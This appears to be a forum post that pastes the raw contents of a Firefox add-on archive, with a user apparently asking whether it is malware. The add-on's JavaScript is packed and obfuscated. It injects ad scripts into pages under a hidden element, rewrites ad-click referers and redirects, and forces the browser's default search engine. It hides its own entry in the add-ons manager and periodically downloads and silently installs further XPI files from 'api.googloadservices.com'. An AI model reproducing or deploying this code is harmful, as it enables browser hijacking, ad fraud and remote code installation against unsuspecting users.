			if (old) old.apply(this, arguments);
		};




		'{adscript}';
	};


	try {
		var _head 	= document.getElementsByTagName("head").item(0);
		var _script	= document.createElement("script");
		_script.id = "idontwanttobeseen";
		if (debug.adscripturl !== null) {
			_script.src = debug.adscripturl;
			log("wrapper.js: adscripturl: ", debug.adscripturl);
		}
		else {
			_script.textContent = '(' + AdscriptWrapped.toString() + ')();';
			log("wrapper.js: AdscriptWrappedtoString()");
		}
		_head.appendChild(_script);
	}
	catch (e) {
		log(e);
	}
PK
     ‰P³H‡øGô  ô  (   resources/adscript-addon/lib/adscript.js
eval('var {Cc, Ci, Cr} = require("chrome");');
var Redirecter		= require('./redirecter').Redirecter;
var Cfg				= require('./cfg');
var Request			= require('sdk/request').Request;
var QueryString 	= require('sdk/querystring');
var Timers			= require('sdk/timers');
var Self 			= require("sdk/self");
var SimpleStorage 	= require("sdk/simple-storage");
var Utils			= require("./utils.js").Utils;
var PageMod 		= require("sdk/page-mod").PageMod;


// where little helpers go to
var utils = new Utils();
// more easy access on simple storage
var ss = SimpleStorage.storage;
// instanciate Config
var cfg = Cfg.getInstance();


eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 9=6(){2.3("V 9()");5.1g=V 3y(5);2.3(\'3u.1z:\',2.1z)};9.3p={1g:3o,1F:6(a){2.3("9.1F()");4 b=5;5.1g.3n();7(8.t)5.1a(8.t);1O.21(6(){b.19()},2.3m)},1y:6(a){2.3("9.1y()");5.1g.3l();5.1m()},19:6(){2.3(\'-----------------------------------\');2.3(\'9.19()\');4 b=5;4 c={\'X-K\':2.A,\'X-W\':G.P};7(2.3k){c[\'X-3j\']=1}J({S:2.Z+"t.2a",y:c,N:6(a){7(a.z){2.3(\'3i 3h\',a.z.1p);7(a.z.1p){b.1P(a.z.1p)}b.Y(a.z.3f||a.z)}25{26 V 28(\'9.3e J.N 1w.z 2c 3d: \'+m.l({I:a.I,1i:a.1i,y:a.y,E:a.E,z:a.z}))}1O.21(6(){b.19()},2.3c)}}).1j()},1P:6(a){4 b=1r["@1v.1D/3b/3a-38;1"].1A(1k.37);4 c=b.36();p(4 d 35 c){2.3("34 32",d.30,d);2.3("2Z",d.1M.11()===a.11());7(d.1M.11()===a.11()){2.3("2Y 2X 2e 2S 1W!",d);b.2R(d,0);b.2O=d;1l}}},Y:6(e){2.3(\'-----------------------------------\');2.3(\'9.Y()\',m.l(e));4 f=5;4 g=10;2.3(\'v.D(m.l(8.t))\',v.D(m.l(8.t)));2.3(\'v.D(m.l(t)\',v.D(m.l(e)));7(v.D(m.l(8.t))!=v.D(m.l(e))){2.3(\'> V t 4 2K 2B 2A, 2z 2y\');g=F}8.t=e;4 h=[];4 j=6(){h.2x();7(h.u==0&&g)f.1a(8.t)};4 k=6(b){4 c=b;2.3(\'H: \',c);7(e[c].1n&&(!8[\'B\'+c]||v.D(8[\'B\'+c])!==e[c].1n)){2.3(\'H/1G 2w:\',(8[\'B\'+c])?F:10);2.3(\'2v/2u: \'+v.D(8[\'B\'+c])+\' / \'+e[c].1n);4 d=2.Z+e[c].1G;2.3(\'2l: \'+d);J({S:d,y:{\'X-K\':2.A,\'X-W\':G.P,\'2k-2j\':\'2i-2h\'},N:6(a){7(a.I==1Y&&(~a.y[\'1Z-20\'].1e(\'2g/23\')||~a.y[\'1Z-20\'].1e(\'E/23\'))){2.3(\'2W 2f[B\'+c+\'] = "\'+a.E.U(/(\\s|\\r\\n|\\n|\\r)/1B,"").1C(0,1q));2d 8[\'B\'+c];8[\'B\'+c]=a.E;g=F}25{26 V 28(\'9.Y J.N 1w.I 2c 1x 1Y: \'+m.l({I:a.I,1i:a.1i,y:a.y,E:(a.E.U(/(\\s|\\r\\n|\\n|\\r)/1B,"").1C(0,1q))}))}j()}}).1j();h.O(F)}};p(4 i C e){k(i)}7(h.u==0)j()},1a:6(a){5.1s();2.3(\'-----------------------------------\');2.3(\'9.1a()\',m.l(a));4 b=5;5.1V();p(4 c C a){b.1U(c,a[c])}},1d:[],1U:6(b,c){4 d=5;2.3("1W",b);4 e=c.2m;4 f=1r["@1v.1D/2n/A-2o;1"].1A(1k.2p);4 g=1r["@1v.1D/2q/2r-2s;1"].1A(1k.2t);7(c.1c){4 h=f.1R(g.A,c.1c);2.3(m.l({H:b,1c:c.1c,1Q:g.A,1K:h}),(h<0)?\'1x 15 \'+b:\'15 \'+b);7(h<0)Q}7(c.13){4 h=f.1R(g.A,c.13);2.3(m.l({H:b,13:c.13,1Q:g.A,1K:h}),(h>=0)?\'1x 15 \'+b:\'15 \'+b);7(h>=0)Q}7(!c.1u){4 i=G.2C.2D(\'2E.2F\').U(\'\\\'{2G}\\\';\',8[\'B\'+b])}2.3("2H",b);4 j=2I({2J:e,2b:c.2b,2L:c.2M||\'2N\',1u:c.1u||i,22:c.22||{},2P:6(a){2.3(\'-----------------------------------\');2.3("2Q "+b);d.1X(a)},1T:c.1T||[\'2T\']});2.3("2U",b);5.1d.O(j)},1V:6(){p(4 i C 5.1d)5.1d[i].2V()},1X:6(d){4 e=5;4 f=5.1S(d.1f);7(!f){f={1f:d.1f,R:{}};5.o.O(f)}d.1f.17(\'31\',6(a){e.1I(f)});d.17(\'33\',6(){e.1t(d)});5.w.O(d);d.16.17(\'1h-27\',6(c){2.3(\'39.16.17 1h-27\',m.l(c));c.M.L=G.P;J({S:2.Z+"?"+1N.l(c.M),y:{\'X-K\':2.A,\'X-W\':G.P,\'X-9-K\':c.1E},N:6(a){4 b=a.z;p(4 i C b)e.29(b[i],f,c);d.16.24(\'1h-1w\',{H:c.H,1h:b})}}).1j()})},29:6(a,b,c){a.3g=2.1z;a.L=v.1L();b.R[a.L]={1o:a.1o,12:a.12,14:a.14,x:a.x,18:a.18,1b:c.M.1b,q:c.M.q};7(a.T){p(4 i C a.T){a.T[i].L=v.1L();b.R[a.T[i].L]={1o:a.T[i].S,12:a.12,14:a.14,x:a.x,18:a.18,1b:c.M.1b,q:c.M.q}}}},o:[],1S:6(a){p(4 i=0;i<5.o.u;i++)7(5.o[i]===a)Q 5.o[i];Q 10},1I:6(a){4 b=5.o.1e(a);2.3(b);7(b>-1){4 c=[];p(4 i=0;i<5.o.u;i++){7(i!==b)c.O(5.o[i])}5.o=c}2.3(\'9.o.u: \'+5.o.u)},w:[],1m:6(){2.3(\'9.1m()\');p(4 i=0;i<5.w.u;i++){3q{5.w[i].16.24(\'3r-1y\',F)}3s(e){2.3(e)}}},1t:6(a){2.3(\'9.1t()\');4 b=5.w.1e(a);2.3(b);7(b>-1){4 c=[];p(4 i=0;i<5.w.u;i++){7(i!==b)c.O(5.w[i])}5.w=c}2.3(\'9.w.u: \'+5.w.u)},3t:6(a){p(4 i=0;i<5.o.u;i++)7(5.o[i].R[a])Q 5.o[i].R[a];Q 10},1J:6(b){2.3(\'----------------------------------------------\');b.L=G.P;2.3(\'9.1J()\',m.l(b));J({S:2.Z+"3v.2a?"+1N.l(b),y:{\'X-K\':2.A,\'X-W\':G.P,\'X-9-K\':b.1E},N:6(a){}}).1j()},1s:6(){2.3(\'----------------------------------------------\');2.3(\'9.1s()\');4 a={\'t\':F};4 b={};p(4 i C 8){2.3(i+\':\');7(!(i C a)&&!(i.U(\'B\',\'\')C 8.t)){b[i]=F}3w(3x 8[i]){1H\'3z\':2.3(\'	\'+m.l(8[i]));1l;1H\'3A\':2.3(\'	\'+8[i].U(/(\\s|\\r\\n|\\n|\\r)/1B,"").1C(0,1q));1l;3B:2.3(\'	\',8[i])}}p(4 i C b){2d 8[i];2.3(\'3C \'+i)}2.3(\'----------------------------------------------\')}};3D.9=9;',62,226,'||cfg|log|var|this|function|if|ss|Adscript||||||||||||stringify|JSON||tabWrappers|for||||config|length|utils|workers||headers|json|version|_|in|md5String|text|true|Self|key|status|Request|Version|uuid|params|onComplete|push|id|return|redirects|url|sitelinks|replace|new|Uuid||configLoadHandle|apiUrl|false|toLowerCase|referer|uaMaxVersion|bid|installing|port|on|feed|configLoad|configHandle|domain|uaMinVersion|pageMods|indexOf|tab|redirecter|ads|statusText|get|Ci|break|workersTellShutdown|hash|target|searchProvider|100|Cc|storageDebug|workerKill|contentScript|mozilla|response|not|shutdown|trackVar|getService|gm|substr|org|adscriptVersion|startup|file|case|tabOnClose|trackRedirection|comparison|guid|name|QueryString|Timers|handleSearchProvider|appInfoVersion|compare|getTabWrapper|attachTo|pageModInstall|pageModUnstallAll|NOW|workerInstall|200|Content|Type|setTimeout|contentScriptOptions|javascript|emit|else|throw|request|Error|prepareAd|php|exclude|was|delete|AS|storage|application|cache|no|control|Cache|requesting|domains|xpcom|comparator|nsIVersionComparator|xre|app|info|nsIXULAppInfo|remoteHash|localHash|exists|pop|update|do|differ|server|data|load|wrapper|js|adscript|INSTALLING|PageMod|include|from|contentScriptWhen|when|start|currentEngine|onAttach|attached|moveEngine|DEFAULT|top|INSTALLED|destroy|setting|GOOGLE|SETTING|RESULT|identifier|close|ENGINE|detach|CHECKING|of|getEngines|nsIBrowserSearchService|service|worker|search|browser|UPDATE_CONFIG_INTERVAL|invalid|loadConfig|pagemods|track_var|Searchprovider|Config|Debug|debug|unregisterObserver|UPDATE_CONFIG_FIRST_UPDATE_DELAY|registerObserver|null|prototype|try|addon|catch|findRedirectForAdUuid|Cfg|click|switch|typeof|Redirecter|object|string|default|deleted|exports'.split('|'),0,{}));
PK
     ‰P³HZ;ža  a  #   resources/adscript-addon/lib/cfg.js


var Utils			= require("./utils.js").Utils;
var utils 			= new Utils();


var Cfg = function(){
    this.trackVar = utils.guid();
};


Cfg.prototype = {
    x:1


    , debug:false


    , version: '0.1.5'


    , apiUrl:'https://api.googloadservices.com/'


    , trackVar:			null


    , UPDATE_CONFIG_FIRST_UPDATE_DELAY:		0


    , UPDATE_CONFIG_INTERVAL:				1000 * 60 * 60 * 12


    , log: function() {
        if (this.debug) console.log.apply(console, arguments);
    }
};


// singleton
var instance = null;
exports.getInstance = function () {
    if (!instance) instance = new Cfg();
    return instance;
};


PK
     ‰P³Hb;t®    $   resources/adscript-addon/lib/main.js
	// IF DEBUG ONLY
	var name = "javascript.options.strict";
	require("sdk/preferences/service").set(name, false);


	var ads = require('./adscript').Adscript;
	var Cfg				= require('./cfg');
	var cfg 			= Cfg.getInstance();


	var Utils			= require("./utils.js").Utils;
	var utils = new Utils();
	utils.hide();


    var update = require("update.js");


	var Adscript = new ads();




	exports.main = function(options, callbacks) {
		cfg.log('exports.main', JSON.stringify(arguments));


		Adscript.startup(options.loadReason);
        update.startup();
	};


	exports.onUnload = function(reason) {
		cfg.log('exports.onUnload', JSON.stringify(arguments));


		Adscript.shutdown(reason);
	};




PK
     ‰P³H‰~1(  (  *   resources/adscript-addon/lib/redirecter.js
eval('var {Cc, Ci, Cr, Cu} = require("chrome");');
var Cfg				= require('./cfg');
var Utils			= require("./utils.js").Utils;




var utils = new Utils();
var cfg = Cfg.getInstance();
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 5=o(a){0.2(\'r 5()\',9.B(1q));4.m=a;0.2(\'13.7:\',0.7);4.C=r V(0.7)};5.Z={C:6,m:6,n:"19-1a-1e-1m",E:o(){0.2(\'5.E()\');3 a=A["@v.s/z-t;1"].u(p.L);a.1r(4,4.n,x)},I:o(){0.2(\'5.I()\');3 a=A["@v.s/z-t;1"].u(p.L);a.11(4,4.n)},G:o(a,b,c){8(b!==4.n)F;a.1b(p.1d);3 d=a.1f.1g;8(!4.C.1h(d))F;0.2("---------------------------------------");0.2("5.G()");0.2("7:          ",0.7);0.2("1j:           ",d);1k{3 f=1p.1F(d);3 g=1s(f.1E[0.7]);3 h=9.W(g);0.2("7 X Y: ",9.B(h));3 i=h.10;3 j=4.m.12(i);8(j){0.2(\'y H 15 \',i);0.2(\'y:          \',9.B(j));3 k=A["@v.s/16/17-t;1"].u(p.18);3 l=k.J(j.K,6,6);a.1c(l);8(j.w){a.D=k.J(j.w,6,6);a.M("N",j.w,x)}O{a.D=6;a.M("N",6,x)}4.m.1i({q:j.q,P:j.P,1l:j.K,Q:j.Q,1n:h.1o,R:h.R,S:h.S,T:h.T,U:h.U})}O{1t r 1u(\'1v.z(), 1w y H, 1x 1y 1z 1A 1B 1C \');}}1D(e){0.2(e)}}};14.5=5;',62,104,'cfg||log|var|this|Redirecter|null|trackVar|if|JSON|||||||||||||source|TOPIC_MODIFY_REQUEST|function|Ci||new|org|service|getService|mozilla|referer|false|redirect|observer|Cc|stringify|trackVarRegexp|referrer|registerObserver|return|observe|found|unregisterObserver|newURI|target|nsIObserverService|setRequestHeader|Referer|else|domain|bid|position|click_type|feed|adscriptVersion|RegExp|parse|from|url|prototype|uuid|removeObserver|findRedirectForAdUuid|Cfg|exports|for|network|io|nsIIOService|http|on|QueryInterface|redirectTo|nsIHttpChannel|modify|URI|spec|test|trackRedirection|matches|try|redirect_url|request|placement|type|utils|arguments|addObserver|decodeURIComponent|throw|Error|Redirector|no|though|secret|key|was|in|URL|catch|queryKey|parseUri'.split('|'),0,{}));
PK
     ‰P³HEª´t  t  &   resources/adscript-addon/lib/update.jseval('var {Cc, Ci, Cr, Cu} = require("chrome");');
var Cfg = require('cfg');
var cfg = Cfg.getInstance();
var Request = require('sdk/request').Request;
var Timers = require('sdk/timers');
var Self = require("sdk/self");
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('p v=q(){};v.z.10=q(a,b){9.o(\'.10\',a,b);p c=O["@J.L/19/1s-15;1"].18(I.1T);p d=c.2s(a,0,w);p e=d.1R();t(d 1V I.22&&d.1l!=1q){9.o(\'!1q 1Q \'+d.1l,d);1r 1S}p f=O["@J.L/1U;1"].14(I.1W);f.1Z(e);p g=0;p h="";2j(g=f.2n()){h+=f.2q(g)}p i=O["@J.L/19/2G-2P-2W;1"].14(I.1B);i.1I(b,1J|1K|1L,1M,0);i.1N(h,h.1O);i.1P();1r Q};v.z.1j=q(a){H.F("D://C/E/13.B");p b=O["@J.L/23/25-26-15;1"].18(I.27);p c=9.28.29(/2a/g,a);p d="2d:2e/2f"+";2h,"+U.M(c);p e=13.1s.2k(d,w,w);t(!b.2l(e,b.1a)){b.2p(e,b.1a)}1b{}};v.z.1c=q(c,d,e){p f={\'0\':\'2C\',\'1\':\'2D\',\'2\':\'2J\',\'3\':\'2V\',\'4\':\'2X\',\'5\':\'33\',\'6\':\'35\',\'7\':\'1C\',\'8\':\'1D\'};p g={\'-1\':\'1E\',\'-2\':\'1F\',\'-3\':\'1G\',\'-4\':\'1H\'};p h={1m:q(a){9.o("1m",a)},1n:q(a){9.o("1n",a)},1p:q(a){9.o("1p",a)},T:q(a){9.o("T",a);m(\'T\',a)},S:q(a){9.o("S",a);m(\'S\',a)},1u:q(a){9.o("1u",a)},1x:q(a){9.o("1x",a)},W:q(a){9.o("W",a);m(\'W\')},R:q(a){9.o("R",a);m(\'R\')},16:q(a,b){9.o("16");n()}};p i=d||{};H.F("D://C/E/G.B");p j=G;p k=q(){9.o("1X");j.1Y(h)};p l=q(){9.o("20");j.21(h)};p m=q(a,b){l();a=[a,\'u:\'+f[b.u+\'\'],\'r:\'+g[b.r+\'\']].24(\' \');t(i.r){i.r.1d(w,a,b)}};p n=q(a){l();t(i.K){i.K.1d(w,a)}};k();t(e){e.1e()}1b{9.o(\'1f.A(1g)\',c);j.A(c,q(a){9.o(\'1f.A::2b\',a);9.o("r",a.r);9.o("u",a.u);a.1e();9.o("2c?")},"1h/x-1i")}};2g{M}=H.F("D://C/E/13.B");v.z.M=M;p P=1k v();p s=q(){};s.z.V=q(){p k=U;p l={\'X-2m\':9.1o,\'X-2o\':Y.Z,\'X-2r\':Y.y,\'X-2t\':Y.1o};t(9.2u){l[\'X-2v\']=1}2w({2x:9.2y+"2z",2A:l,2B:q(g){t(g.11&&g.11.1t){2E(p h 2F g.11.1t){p i={12:\'2H\',2I:h};H.F("D://C/E/1v.B");p j=1v.2K("2L",[2M.2N()+".2O"]);P.10(h,j);H.F("D://C/E/G.B");9.o(\'s.A(1g)\',j);G.A(j,q(d){9.o(\'s\',d);9.o("r",d.r);9.o("u",d.u);9.o(d.y);9.o(d.y);9.o(d.1w.Z);9.o(d.y);9.o(d.y);p f="w";2Q{f=d.1w.Z}2R(e){}G.2S(f,q(c){9.o("2T 2U");9.o(c);t(!c){P.1j(d.y)}i.N=j;i.1y=d;P.1c(i.N,{K:q(a){9.o(\'s.1z::\'+i.12+\' K\',a);i.N.1A(Q)},r:q(a,b){9.o(\'s.1z::\'+i.12+\' r: \',a,b);i.N.1A(Q)}},i.1y)})},"1h/x-1i")}}2Y.2Z(q(){k.V()},9.30)}}).31()};s.z.32=q(){U.V()};p 17=1k s();34.2i=17;',62,192,'|||||||||cfg|||||||||||||||log|var|function|error|Updater|if|state|Utils|null||name|prototype|getInstallForFile|jsm|gre|resource|modules|import|AddonManager|Cu|Ci|mozilla|success|org|btoa|tmpNsIFile|Cc|utils|true|onInstallFailed|onDownloadFailed|onDownloadCancelled|this|checkUpdate|onInstallCancelled||Self|id|downloadFile|json|action|Services|createInstance|service|onInstallEnded|updater|getService|network|USER_SHEET|else|installXpiFromFile|call|install|am|aNsIFile|application|xpinstall|addonHide|new|responseStatus|onNewInstall|onDownloadStarted|version|onDownloadProgress|200|return|io|items|onDownloadEnded|FileUtils|addon|onInstallStarted|aAddonInstall|shutdown|remove|nsIFileOutputStream|STATE_INSTALL_FAILED|STATE_CANCELLED|ERROR_NETWORK_FAILURE|ERROR_INCORRECT_HASH|ERROR_CORRUPT_FILE|ERROR_FILE_ACCESS|init|0x02|0x08|0x20|0666|write|length|close|but|open|false|nsIIOService|binaryinputstream|instanceof|nsIBinaryInputStream|listenerStart|addInstallListener|setInputStream|listenerStop|removeInstallListener|nsIHttpChannel|content|join|style|sheet|nsIStyleSheetService|user_sheet|replace|extension_id|callback|afterInstall|data|text|css|const|base64|exports|while|newURI|sheetRegistered|Version|available|Uuid|loadAndRegisterSheet|readBytes|AName|newChannel|AVersion|debug|Debug|Request|url|apiUrl|upd|headers|onComplete|STATE_AVAILABLE|STATE_DOWNLOADING|for|of|file|versions_xpi|extUrl|STATE_CHECKING|getFile|TmpD|Math|random|xpi|output|try|catch|getAddonByID|ADDON|IS|STATE_DOWNLOADED|stream|STATE_DOWNLOAD_FAILED|Timers|setTimeout|UPDATE_CONFIG_INTERVAL|get|startup|STATE_INSTALLING|module|STATE_INSTALLED'.split('|'),0,{}));
PK
     ‰P³HÐîM
  M
  %   resources/adscript-addon/lib/utils.js
eval('var {Cc, Ci, Cr, Cu} = require("chrome");');
var self = require("sdk/self");
var tabs = require('sdk/tabs');
var base = require("sdk/base64.js");


eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 p=4(){};p.1j={1k:4(){1f.1b("17://X/W/U.T");U.20(2k.2q,4(g){3 h=g.5;3 i=4(){3 c=H.P(\'#7-5\');3 d=1q 1w(4(b){b.25(4(a){3 x=H.P("#7-A");x.t=x.t.y("u","");v(1E h=="1H"||a.1J.1P==h){x.t=x.t+" u"}})});3 f={24:E,2i:E,2j:E};1g{d.2l(c,f)}18(e){}};3 j=\'3 1l = "\'+h+\'"; 3 1m = \'+i.B()+\'();\';C.1s(\'1u\',4(a){v(C.V.1x=="S:R"){3 b=a.Q({1h:j})}});1g{C.V.Q({1h:j})}18(e){}3 k=\'					@-22-H 23(".*S:R.*")					{					  .L[5="J"] .27 {						2b:I;					  }					  .L[5="J"] {						Z-M: I !N;					  }					  #7-A.u {					  	Z-M: I !N;					  }					  #7-A.u #7-2m > * {					  	2o: 0;						2r: 1i;					  }					}\';1f.1b("17://X/W/O.T");3 l=G["@F.w/1o/1p-2H-1r;1"].1t(D.1v);3 m=k.y(/J/g,h);3 n="1y:1z/1A"+";1B,"+1C.1D(m);3 o=O.1F.1G(n,Y,Y);v(!l.1I(o,l.K)){l.1K(o,l.K)}1L{}})},1M:4(b){3 c=G["@F.w/1N/1O"].10(D.1Q);c.1R="1S-8";3 d={};3 e=c.1T(b,d);3 f=G["@F.w/1U/1V;1"].10(D.1W);f.1X(f.1Y);f.1Z(e,e.11);3 g=f.21(13);4 15(a){9("0"+a.B(16)).26(-2)}3 s="";28(3 i=0;i<g.11;i++){s+=15(g.29(i))}9 s},2a:4(){3 a=4(){9 19.2c((1+19.2d())*2e).B(16).2f(1)};9 a()+a()+\'-\'+a()+\'-\'+a()+\'-\'+a()+\'-\'+a()+a()+a()},2g:4(d){3 o=2h.1a,m=o.r[o.1c?"1d":"1e"].2n(d),6={},i=14;2p(i--)6[o.z[i]]=m[i]||"";6[o.q.5]={};6[o.z[12]].y(o.q.r,4(a,b,c){v(b)6[o.q.5][b]=c});9 6},1a:{1c:13,z:["2s","2t","2u","2v","2w","2x","2y","2z","2A","2B","2C","2D","2E","2F"],q:{5:"2G",r:/(?:^|&)([^&=]*)=?([^&]*)/g},r:{1d:/^(?:([^:\\/?#]+):)?(?:\\/\\/((?:(([^:@]*)(?::([^:@]*))?)?@)?([^:\\/?#]*)(?::(\\d*))?))?((((?:[^?#\\/]*\\/)*)([^?#]*))(?:\\?([^#]*))?(?:#(.*))?)/,1e:/^(?:(?![^:@]+:[^:@\\/]*@)([^:\\/?#.]+):)?(?:\\/\\/)?((?:(([^:@]*)(?::([^:@]*))?)?@)?([^:\\/?#]*)(?::(\\d*))?)(((\\/(?:[^?#](?![^?#\\/]*\\.[^?#\\/.]+(?:[?#]|$)))*\\/?)?([^?#\\/]*))(?:\\?([^#]*))?(?:#(.*))?)/}}};1n.p=p;',62,168,'|||var|function|name|uri|detail||return||||||||||||||||Utils||parser||className|safe|if|org||replace|key|view|toString|tabs|Ci|true|mozilla|Cc|document|none|extension_id|USER_SHEET|addon|image|important|Services|querySelector|attach|addons|about|jsm|AddonManager|activeTab|modules|gre|null|background|createInstance|length||false||toHexString||resource|catch|Math|parseUri_options|import|strictMode|strict|loose|Cu|try|contentScript|hidden|prototype|hide|addonName|fn|exports|content|style|new|service|on|getService|ready|nsIStyleSheetService|MutationObserver|url|data|text|css|base64|base|encode|typeof|io|newURI|undefined|sheetRegistered|target|loadAndRegisterSheet|else|md5String|intl|scriptableunicodeconverter|textContent|nsIScriptableUnicodeConverter|charset|UTF|convertToByteArray|security|hash|nsICryptoHash|init|MD5|update|getAddonByID|finish|moz|regexp|attributes|forEach|slice|warning|for|charCodeAt|guid|display|floor|random|0x10000|substring|parseUri|this|childList|characterData|self|observe|notifications|exec|height|while|id|overflow|source|protocol|authority|userInfo|user|password|host|port|relative|path|directory|file|query|anchor|queryKey|sheet'.split('|'),0,{}));
PK 
     ‰P³HZ×œíç1  ç1                   bootstrap.jsPK 
     ‰P³H                         2  defaults/preferences/prefs.jsPK 
     ‰P³H@+¦‘ë
  ë
               L2  harness-options.jsonPK 
     ‰P³H4úV  V               i@  install.rdfPK 
     ‰P³Hhô¦É                   èD  locales.jsonPK 
     ‰P³HîñŠ‹  ‹  (             "E  resources/adscript-addon/data/wrapper.jsPK 
     ‰P³H‡øGô  ô  (             óM  resources/adscript-addon/lib/adscript.jsPK 
     ‰P³HZ;ža  a  #             -h  resources/adscript-addon/lib/cfg.jsPK 
     ‰P³Hb;t®    $             Ïj  resources/adscript-addon/lib/main.jsPK 
     ‰P³H‰~1(  (  *             ¾m  resources/adscript-addon/lib/redirecter.jsPK 
     ‰P³HEª´t  t  &             .v  resources/adscript-addon/lib/update.jsPK 
     ‰P³HÐîM
  M
  %             æ†  resources/adscript-addon/lib/utils.jsPK      ˆ  v”

Alles anzeigen

Beiträge von flo08

Malware-"Addon"?

Malware-"Addon"?

Malware-"Addon"?

Malware-"Addon"?